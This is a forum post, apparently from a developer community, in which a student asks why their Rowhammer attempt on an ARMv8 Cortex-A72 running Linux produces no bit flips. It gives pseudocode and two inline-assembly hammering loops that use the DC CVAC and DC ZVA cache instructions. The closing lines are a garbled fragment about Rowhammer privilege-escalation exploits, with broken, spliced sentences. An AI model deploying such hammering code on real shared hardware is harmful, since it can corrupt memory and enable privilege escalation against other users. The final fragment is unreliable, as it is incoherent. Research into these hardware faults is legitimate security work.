We are running a survey to help us improve the experience for all of our members. If you see the survey appear, please take the time to tell us about your experience if you can.
Hi Everyone,
I have been trying exploiting Rowhammer bug on ARMv8 running linux for a university project.
The device is a Quad core Cortex-A72 (ARM v8) 64-bit SoC @ 1.5GHz.
First i checked the UCI bit value in the SCTLR register, and is set. So the unprivileged instructions to flush the cache are enabled.
The pseudocode is:
put addr1 into X9 put addr2 into x10 for i:= 0 to N−1 do STR X0, [X9] STR X0, [X10] DC CIVAC, X9 DC CIVAC, X10
I'm using two approaches to exploit Rh bug:
First approach is based on using unprivileged instructions to flush the cache (DC CIVAC, DC CVAC).
Using timing measurements i can get two addresses SBDR (Same Bank Different Rows) addr1 and addr2, and then i'm ready to run my rh loop:
for (int i = 0;i<HAMMER_ROUND;i++){ asm volatile( "str %2, [%0]\n\t" "str %2, [%1]\n\t" "dc cvac, %0\n\t" "dc cvac, %1\n\t" //"dsb 0xb" ::"r" (addr1), "r" (addr2), "r" (temp) ); }
The second approach is based on bypassing the cache using DC ZVA instruction.
In this case, i allocated a memory pool and set it to 0 value.
asm volatile( "dc civac, %0\n\t" "dc civac, %1\n\t" ::"r" (addr1), "r" (addr2) ); for (int j = 0; j < HAMMER_ROUND; ++j) { __asm__ __volatile__("dc zva, %0\n\t" : : "r" (addr1) :"memory"); __asm__ __volatile__("dc zva, %0\n\t" : : "r" (addr2) :"memory"); }
I have no bit flips.
My question is : am i using those instructions right ?
Thank you.
One exploit uses rowhammer-induced bit flips to gain kernel privileges on This works because DRAM cells have been getting smaller and closer together. The second runs as a normal x86-64 process on Linux and escalates which isn't useful for our exploit, so we can skip trying to use this bit flip here .